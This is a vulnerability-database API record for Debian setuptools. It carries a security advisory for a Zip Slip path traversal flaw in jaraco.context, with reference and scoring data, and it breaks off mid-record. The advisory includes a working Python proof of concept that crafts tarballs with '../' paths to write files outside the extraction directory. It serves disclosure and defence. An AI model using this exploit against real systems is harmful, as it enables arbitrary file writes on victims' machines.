Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/939279?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/939279?format=api", "purl": "pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie", "type": "deb", "namespace": "debian", "name": "setuptools", "version": "78.1.1-0.1", "qualifiers": { "distro": "trixie" }, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": null, "latest_non_vulnerable_version": null, "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20759?format=api", "vulnerability_id": "VCID-v6y5-h7b6-3qda", "summary": "jaraco.context Has a Path Traversal Vulnerability\n### Summary\nThere is a Zip Slip path traversal vulnerability in the jaraco.context package affecting setuptools as well, in `jaraco.context.tarball()` function. The vulnerability may allow attackers to extract files outside the intended extraction directory when malicious tar archives are processed.\nThe strip_first_component filter splits the path on the first `/` and extracts the second component, while allowing `../` sequences. Paths like `dummy_dir/../../etc/passwd` become `../../etc/passwd`.\nNote that this suffers from a nested tarball attack as well with multi-level tar files such as `dummy_dir/inner.tar.gz`, where the inner.tar.gz includes a traversal `dummy_dir/../../config/.env` that also gets translated to `../../config/.env`.\n\nThe code can be found:\n- https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91\n- https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76 (inherited)\n\nThis report was also sent to setuptools maintainers and they asked some questions regarding this.\n\nThe lengthy answer is:\n\nThe vulnerability seems to be the `strip_first_component` filter function, not the tarball function itself and has the same behavior on any tested Python version locally (from 11 to 14, as I noticed that there is a backports conditional for the tarball).\nThe stock tarball for Python 3.12+ is considered not vulnerable (until proven otherwise 😄) but here the custom filter seems to overwrite the native filtering and introduces the issue - while overwriting the updated secure Python 3.12+ behavior and giving a false sense of sanitization.\n\nThe short answer is:\n\nIf we are talking about Python < 3.12 the tarball and jaraco implementations / behaviors are relatively the same but for Python 3.12+ the jaraco implementation overwrites the native tarball protection.\n\nSampled tests:\n<img width=\"1634\" height=\"245\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ce6c0de6-bb53-4c2b-818a-d77e28d2fbeb\" />\n\n### Details\n\nThe flow with setuptools in the mix:\n```\nsetuptools._vendor.jaraco.context.tarball() > req = urlopen(url) > with tarfile.open(fileobj=req, mode='r|*') as tf: > tf.extractall(path=target_dir, filter=strip_first_component) > strip_first_component (Vulnerable)\n```\n\n### PoC\n\nThis was tested on multiple Python versions > 11 on a Debian GNU 12 (bookworm).\nYou can run this directly after having all the dependencies:\n```py\n#!/usr/bin/env python3\nimport tarfile\nimport io\nimport os\nimport sys\nimport shutil\nimport tempfile\nfrom setuptools._vendor.jaraco.context import strip_first_component\n\n\ndef create_malicious_tarball(traversal_to_root: str):\n tar_data = io.BytesIO()\n with tarfile.open(fileobj=tar_data, mode='w') as tar:\n # Create a malicious file path with traversal sequences\n malicious_files = [\n # Attempt 1: Simple traversal to /tmp\n {\n 'path': f'dummy_dir/{traversal_to_root}tmp/pwned_by_zipslip.txt',\n 'content': b'[ZIPSLIP] File written to /tmp via path traversal!',\n 'name': 'pwned_via_tmp'\n },\n # Attempt 2: Try to write to home directory\n {\n 'path': f'dummy_dir/{traversal_to_root}home/pwned_home.txt',\n 'content': b'[ZIPSLIP] Attempted write to home directory',\n 'name': 'pwned_via_home'\n },\n # Attempt 3: Try to write to current directory parent\n {\n 'path': 'dummy_dir/../escaped.txt',\n 'content': b'[ZIPSLIP] File in parent directory!',\n 'name': 'pwned_escaped'\n },\n # Attempt 4: Legitimate file for comparison\n {\n 'path': 'dummy_dir/legitimate_file.txt',\n 'content': b'This file stays in target directory',\n 'name': 'legitimate'\n }\n ]\n for file_info in malicious_files:\n content = file_info['content']\n tarinfo = tarfile.TarInfo(name=file_info['path'])\n tarinfo.size = len(content)\n tar.addfile(tarinfo, io.BytesIO(content))\n\n tar_data.seek(0)\n return tar_data\n\n\ndef exploit_zipslip():\n print(\\\"[*] Target: setuptools._vendor.jaraco.context.tarball()\\\")\n\n # Create temporary directory for extraction\n temp_base = tempfile.mkdtemp(prefix=\\\"zipslip_test_\\\")\n target_dir = os.path.join(temp_base, \\\"extraction_target\\\")\n\n try:\n os.mkdir(target_dir)\n print(f\\\"[+] Created target extraction directory: {target_dir}\\\")\n\n target_dir_abs = os.path.abspath(target_dir)\n print(target_dir_abs)\n depth_to_root = len([p for p in target_dir_abs.split(os.sep) if p])\n traversal_to_root = \\\"../\\\" * depth_to_root\n print(f\\\"[+] Using traversal_to_root prefix: {traversal_to_root!r}\\\")\n\n # Create malicious tarball\n print(\\\"[*] Creating malicious tar archive...\\\")\n tar_data = create_malicious_tarball(traversal_to_root)\n\n try:\n with tarfile.open(fileobj=tar_data, mode='r') as tf:\n for member in tf:\n # Apply the ACTUAL vulnerable function from setuptools\n processed_member = strip_first_component(member, target_dir)\n print(f\\\"[*] Extracting: {member.name:40} -> {processed_member.name}\\\")\n\n # Extract to target directory\n try:\n tf.extract(processed_member, path=target_dir)\n print(f\\\" ✓ Extracted successfully\\\")\n except (PermissionError, FileNotFoundError, OSError) as e:\n print(f\\\" ! {type(e).__name__}: Path traversal ATTEMPTED\\\")\n except Exception as e:\n print(f\\\"[!] Extraction raised exception: {type(e).__name__}: {e}\\\")\n\n # Check results\n print(\\\"[*] Checking for extracted files...\\\")\n\n # Check target directory\n print(f\\\"[*] Files in target directory ({target_dir}):\\\")\n if os.path.exists(target_dir):\n for root, _, files in os.walk(target_dir):\n level = root.replace(target_dir, '').count(os.sep)\n indent = ' ' * 2 * level\n print(f\\\"{indent}{os.path.basename(root)}/\\\")\n subindent = ' ' * 2 * (level + 1)\n for file in files:\n filepath = os.path.join(root, file)\n try:\n with open(filepath, 'r') as f:\n content = f.read()[:50]\n print(f\\\"{subindent}{file}\\\")\n print(f\\\"{subindent} └─ {content}...\\\")\n except:\n print(f\\\"{subindent}{file} (binary)\\\")\n else:\n print(f\\\"[!] Target directory not found!\\\")\n\n print()\n print(\\\"[*] Checking for traversal attempts...\\\")\n print()\n\n # Check if files escaped\n traversal_attempts = [\n (\\\"/tmp/pwned_by_zipslip.txt\\\", \\\"Escape to /tmp\\\"),\n (os.path.expanduser(\\\"~/pwned_home.txt\\\"), \\\"Escape to home\\\"),\n (os.path.join(temp_base, \\\"escaped.txt\\\"), \\\"Escape to parent\\\"),\n ]\n\n escaped = False\n for check_path, description in traversal_attempts:\n if os.path.exists(check_path):\n print(f\\\"[+] Path Traversal Confirmed: {description}\\\")\n print(f\\\" File created at: {check_path}\\\")\n try:\n with open(check_path, 'r') as f:\n content = f.read()\n print(f\\\" Content: {content}\\\")\n print(f\\\" Removing: {check_path}\\\")\n os.remove(check_path)\n except Exception as e:\n print(f\\\" Error reading: {e}\\\")\n escaped = True\n else:\n print(f\\\"[-] OK: {description} - No escape detected\\\")\n\n if escaped:\n print(\\\"[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed!\\\")\n else:\n print(\\\"[-] No path traversal detected (mitigation in place)\\\")\n\n finally:\n # Cleanup\n print()\n print(f\\\"[*] Cleaning up: {temp_base}\\\")\n try:\n shutil.rmtree(temp_base)\n except Exception as e:\n print(f\\\"[!] Cleanup error: {e}\\\")\n\n\ndef check_python_version():\n print(f\\\"[+] Python version: {sys.version}\\\")\n # Python 3.11.4+ added DEFAULT_FILTER\n if hasattr(tarfile, 'DEFAULT_FILTER'):\n print(\\\"[+] Python has DEFAULT_FILTER (tarfile security hardening)\\\")\n else:\n print(\\\"[!] Python does not have DEFAULT_FILTER (older version)\\\")\n print()\n\n\nif __name__ == \\\"__main__\\\":\n check_python_version()\n exploit_zipslip()\n```\n\nOutput:\n```\n[+] Python version: 3.11.2 (main, Apr 28 2025, 14:11:48) [GCC 12.2.0] \n[!] Python does not have DEFAULT_FILTER (older version) \n\n[*] Target: setuptools._vendor.jaraco.context.tarball() \n[+] Created target extraction directory: /tmp/zipslip_test_tnu3qpd5/extraction_target \n[*] Creating malicious tar archive... \n[*] Extracting: ../../tmp/pwned_by_zipslip.txt -> ../../tmp/pwned_by_zipslip.txt \n ✓ Extracted successfully \n[*] Extracting: ../../../../home/pwned_home.txt -> ../../../../home/pwned_home.txt \n ! PermissionError: Path traversal ATTEMPTED \n[*] Extracting: ../escaped.txt -> ../escaped.txt \n ✓ Extracted successfully \n[*] Extracting: legitimate_file.txt -> legitimate_file.txt \n ✓ Extracted successfully \n[*] Checking for extracted files... \n[*] Files in target directory (/tmp/zipslip_test_tnu3qpd5/extraction_target): \nextraction_target/ \n legitimate_file.txt \n └─ This file stays in target directory... \n\n[*] Checking for traversal attempts... \n\n[-] OK: Escape to /tmp - No escape detected \n[-] OK: Escape to home - No escape detected \n[+] Path Traversal Confirmed: Escape to parent \n File created at: /tmp/zipslip_test_tnu3qpd5/escaped.txt \n Content: [ZIPSLIP] File in parent directory! \n Removing: /tmp/zipslip_test_tnu3qpd5/escaped.txt \n[+] EXPLOIT SUCCESSFUL - Path traversal vulnerability confirmed! \n\n[*] Cleaning up: /tmp/zipslip_test_tnu3qpd5\n```\n\n### Impact\n\n- Arbitrary file creation in filesystem (HIGH exploitability) - especially if popular packages download tar files remotely and use this package to extract files.\n- Privesc (LOW exploitability)\n- Supply-Chain attack (VARIABLE exploitability) - relevant to the first point.\n\n### Remediation\n\nI guess removing the custom filter is not feasible given the backward compatibility issues that might come up you can use a safer filter `strip_first_component` that skips or sanitizes `../` character sequences since it is already there eg.\n```\nif member.name.startswith('/') or '..' in member.name:\n raise ValueError(f\\\"Attempted path traversal detected: {member.name}\\\")\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23949.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23949.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23949", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25507", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.2549", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25567", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25505", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25439", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25802", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25702", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25902", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25672", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25744", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25792", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.2576", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25549", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25599", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25608", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25858", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25664", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25688", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00091", "scoring_system": "epss", "scoring_elements": "0.25705", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23949" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/jaraco/jaraco.context", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/jaraco/jaraco.context" }, { "reference_url": "https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/" } ], "url": "https://github.com/jaraco/jaraco.context/blob/main/jaraco/context/__init__.py#L74-L91" }, { "reference_url": "https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/" } ], "url": "https://github.com/jaraco/jaraco.context/commit/7b26a42b525735e4085d2e994e13802ea339d5f9" }, { "reference_url": "https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/" } ], "url": "https://github.com/jaraco/jaraco.context/security/advisories/GHSA-58pv-8j8x-9vj2" }, { "reference_url": "https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-01-20T17:02:42Z/" } ], "url": "https://github.com/pypa/setuptools/blob/main/setuptools/_vendor/jaraco/context.py#L55-L76" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23949", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23949" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126078", "reference_id": "1126078", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126078" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126729", "reference_id": "1126729", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126729" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431026", "reference_id": "2431026", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431026" }, { "reference_url": "https://github.com/advisories/GHSA-58pv-8j8x-9vj2", "reference_id": "GHSA-58pv-8j8x-9vj2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-58pv-8j8x-9vj2" }, { "reference_url": "https://usn.ubuntu.com/7979-1/", "reference_id": "USN-7979-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7979-1/" } ], "fixed_packages": [], "aliases": [ "CVE-2026-23949", "GHSA-58pv-8j8x-9vj2" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v6y5-h7b6-3qda" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/9905?format=api", "vulnerability_id": "VCID-ebnc-7f5a-effj", "summary": "Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-40897.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-40897.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-40897", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66616", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66596", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66623", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66579", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.6656", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66559", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66543", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66519", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66534", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66517", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66513", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66525", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66505", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66491", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66443", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66472", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66481", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00513", "scoring_system": "epss", "scoring_elements": "0.66445", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-40897" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40897", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40897" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2022-43012.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2022-43012.yaml" }, { "reference_url": "https://github.com/pypa/setuptools", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/setuptools" }, { "reference_url": "https://github.com/pypa/setuptools/blob/fe8a98e696241487ba6ac9f91faa38ade939ec5d/setuptools/package_index.py#L200", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://github.com/pypa/setuptools/blob/fe8a98e696241487ba6ac9f91faa38ade939ec5d/setuptools/package_index.py#L200" }, { "reference_url": "https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be" }, { "reference_url": "https://github.com/pypa/setuptools/compare/v65.5.0...v65.5.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://github.com/pypa/setuptools/compare/v65.5.0...v65.5.1" }, { "reference_url": "https://github.com/pypa/setuptools/issues/3659", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/setuptools/issues/3659" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 